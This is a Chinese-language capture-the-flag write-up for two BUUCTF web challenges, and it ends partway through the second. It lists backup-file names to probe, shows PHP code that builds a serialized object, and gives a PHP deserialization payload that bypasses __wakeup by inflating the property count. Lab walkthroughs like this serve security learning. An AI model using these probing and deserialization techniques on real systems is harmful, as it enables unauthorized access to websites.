BUUCTF-Web方向16-20wp

[极客大寻衅 2019]PHP

由内容提示应该存在源码备份，常见的如下，一个个尝试

1. 后缀：tar tar.gz zip rar
2. 名字：www web website backup back wwwroot temp

复制代码

访问www.zip，下载下来

解压查看

index.php

flag.php

class.php

1. [/code]结果如下
2. [code]<?php
3. class Name{
4.     private $username = 'admin';
5.     private $password = 100;
6. }
7. $A=new Name();
8. echo serialize($A);
9. ?>

复制代码

• 这里需要绕过__wakeup函数，而__wakeup函数存在一个特性，当成员属性数量大于实际数量时才可绕过wakeup
  
• 由于序列化的存在空字符，故需要%00来代替，即空字符的url编码
  

1. O:4:"Name":2:{s:14:" Name username";s:5:"admin";s:14:" Name password";i:100;}

复制代码

拿到flag

[ACTF2020 新生赛]BackupFile

题目提示备份文件

1. 后缀：tar tar.gz zip rar
2. 名字：www web website backup back wwwroot temp

复制代码

除了以上这些，还有.bak/.swp/.old，都可以试试
这里使用dirsearch扫出来index.php.bak文件，下载下来

使用记事本打开
[code]